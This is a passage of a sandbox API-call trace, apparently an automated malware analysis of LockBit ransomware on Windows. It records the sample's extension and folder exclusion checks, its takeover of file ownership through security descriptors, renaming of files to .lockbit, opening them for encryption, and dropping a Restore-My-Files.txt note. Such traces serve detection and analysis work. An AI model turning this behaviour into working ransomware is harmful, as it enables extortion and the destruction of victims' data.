lpString2=".xml") returned -1 [0080.641] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0080.641] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0080.641] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0080.641] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0080.641] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0080.641] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0080.641] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0080.641] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0080.641] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0080.641] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0080.641] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0080.641] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0080.641] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0080.641] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0080.642] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0080.642] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0080.642] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0080.642] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0080.642] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0080.642] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0080.642] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0080.642] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0080.642] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0080.642] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0080.642] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0080.642] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0080.642] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0080.642] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0080.643] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0080.643] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0080.643] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0080.643] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0080.643] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0080.643] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0080.643] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0080.643] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0080.643] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0080.643] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0080.643] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="keypad.xml") returned 1 [0080.643] lstrcmpiW (lpString1="ntldr", lpString2="keypad.xml") returned 1 [0080.643] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="keypad.xml") returned 1 [0080.643] lstrcmpiW (lpString1="bootsect.bak", lpString2="keypad.xml") returned -1 [0080.644] lstrcmpiW (lpString1="autorun.inf", lpString2="keypad.xml") returned -1 [0080.644] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\") returned="" [0080.644] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml") returned=".xml" [0080.644] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0080.644] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0080.644] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0080.644] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0080.644] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0080.644] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0080.644] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0080.644] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0080.644] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0080.644] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0080.644] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0080.645] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0080.645] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0080.645] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0080.645] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0080.645] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0080.645] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0080.645] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0080.645] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0080.645] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0080.645] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0080.645] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0080.645] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0080.645] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0080.645] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0080.646] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0080.646] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0080.646] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0080.646] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.lockbit") returned 84 [0080.646] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0080.646] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.lockbit")) returned 0 [0080.654] GetLastError () returned 0x5 [0080.654] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0080.655] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0080.655] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.655] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0080.655] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0080.656] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3c0, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0080.656] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0080.656] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0080.672] NtClose (Handle=0x3c0) returned 0x0 [0080.672] RtlFreeAnsiString (AnsiString="\\") [0080.672] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3c0) returned 1 [0080.673] malloc (_Size=0x200) returned 0x53fcc0 [0080.673] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0080.673] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0080.673] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0080.673] CloseHandle (hObject=0x3c0) returned 1 [0080.673] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0080.674] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0080.674] free (_Block=0x53fcc0) [0080.675] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0080.675] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.lockbit")) returned 1 [0080.676] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0080.676] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0080.676] malloc (_Size=0x40068) returned 0x20abae0 [0080.678] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x20abaf8 | out: lpFileSize=0x20abaf8*=727) returned 1 [0080.678] ReadFile (in: hFile=0x3c0, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0080.685] GetLastError () returned 0x3e5 [0080.685] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions") returned 1 [0080.685] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Restore-My-Files.txt") returned 86 [0080.686] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.686] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="main", cAlternateFileName="")) returned 1 [0080.686] lstrcmpiW (lpString1=".", lpString2="main") returned -1 [0080.686] lstrcmpiW (lpString1="..", lpString2="main") returned -1 [0080.686] lstrcmpiW (lpString1="main", lpString2="$windows.~bt") returned 1 [0080.686] lstrcmpiW (lpString1="main", lpString2="intel") returned 1 [0080.686] lstrcmpiW (lpString1="main", lpString2="msocache") returned -1 [0080.686] lstrcmpiW (lpString1="main", lpString2="$recycle.bin") returned 1 [0080.686] lstrcmpiW (lpString1="main", lpString2="$windows.~ws") returned 1 [0080.686] lstrcmpiW (lpString1="main", lpString2="tor browser") returned -1 [0080.686] lstrcmpiW (lpString1="main", lpString2="boot") returned 1 [0080.687] lstrcmpiW (lpString1="main", lpString2="system volume information") returned -1 [0080.687] lstrcmpiW (lpString1="main", lpString2="perflogs") returned -1 [0080.687] lstrcmpiW (lpString1="main", lpString2="google") returned 1 [0080.687] lstrcmpiW (lpString1="main", lpString2="application data") returned 1 [0080.687] lstrcmpiW (lpString1="main", lpString2="windows") returned -1 [0080.687] lstrcmpiW (lpString1="main", lpString2="windows.old") returned -1 [0080.687] lstrcmpiW (lpString1="main", lpString2="appdata") returned 1 [0080.687] lstrcmpiW (lpString1="main", lpString2="Windows nt") returned -1 [0080.687] lstrcmpiW (lpString1="main", lpString2="Msbuild") returned -1 [0080.687] lstrcmpiW (lpString1="main", lpString2="Microsoft") returned -1 [0080.687] lstrcmpiW (lpString1="main", lpString2="All users") returned 1 [0080.687] lstrcmpiW (lpString1="main", lpString2="mozilla") returned -1 [0080.687] wsprintfW (in: param_1=0x344ca60, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main") returned 70 [0080.687] wsprintfW (in: param_1=0x344c2c0, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\*") returned 72 [0080.688] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\*"), fInfoLevelId=0x0, lpFindFileData=0x344c7a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344c7a8) returned 0x2e32d0 [0080.699] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0080.699] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0080.699] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0080.699] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0080.699] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f643b69, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f643b69, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f643b69, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc4e, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="base.xml", cAlternateFileName="")) returned 1 [0080.699] lstrcmpiW (lpString1=".", lpString2="base.xml") returned -1 [0080.699] lstrcmpiW (lpString1="..", lpString2="base.xml") returned -1 [0080.699] PathFindExtensionW (pszPath="base.xml") returned=".xml" [0080.700] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0080.700] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0080.700] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0080.700] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0080.700] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0080.700] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0080.700] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0080.700] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0080.700] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0080.700] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0080.700] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0080.700] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0080.700] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0080.700] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0080.700] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0080.700] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0080.700] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0080.700] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0080.700] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0080.700] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0080.700] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0080.701] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0080.701] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0080.701] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0080.701] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0080.701] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0080.701] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0080.701] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0080.701] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0080.701] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0080.701] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0080.701] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0080.701] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0080.701] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0080.701] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0080.701] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0080.701] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0080.701] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0080.701] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0080.701] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0080.701] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0080.701] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0080.701] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0080.702] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0080.702] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0080.702] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0080.702] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0080.702] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="base.xml") returned 1 [0080.702] lstrcmpiW (lpString1="ntldr", lpString2="base.xml") returned 1 [0080.702] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="base.xml") returned 1 [0080.702] lstrcmpiW (lpString1="bootsect.bak", lpString2="base.xml") returned 1 [0080.702] lstrcmpiW (lpString1="autorun.inf", lpString2="base.xml") returned -1 [0080.702] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\") returned="" [0080.702] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml") returned=".xml" [0080.702] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0080.702] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0080.702] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0080.702] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0080.702] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0080.702] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0080.702] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0080.702] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0080.702] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0080.703] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0080.703] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0080.703] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0080.703] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0080.703] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0080.703] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0080.703] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0080.703] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0080.703] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0080.703] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0080.703] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0080.703] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0080.703] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0080.703] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0080.703] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0080.703] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0080.703] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0080.703] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0080.703] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0080.703] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.lockbit") returned 87 [0080.703] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0080.704] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.lockbit")) returned 0 [0080.825] GetLastError () returned 0x5 [0080.825] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0080.826] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0080.826] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.826] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0080.826] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0080.826] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3c0, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0080.826] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0080.826] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0080.949] NtClose (Handle=0x3c0) returned 0x0 [0080.949] RtlFreeAnsiString (AnsiString="\\") [0080.949] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3c0) returned 1 [0080.949] malloc (_Size=0x200) returned 0x53fcc0 [0080.950] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0080.950] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0080.950] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0080.950] CloseHandle (hObject=0x3c0) returned 1 [0080.950] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0080.950] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0080.951] free (_Block=0x53fcc0) [0080.951] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0080.951] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.lockbit")) returned 1 [0080.964] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0080.964] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0080.964] malloc (_Size=0x40068) returned 0x206b860 [0080.965] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=3150) returned 1 [0080.965] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0080.966] GetLastError () returned 0x3e5 [0080.966] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main") returned 1 [0080.967] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common 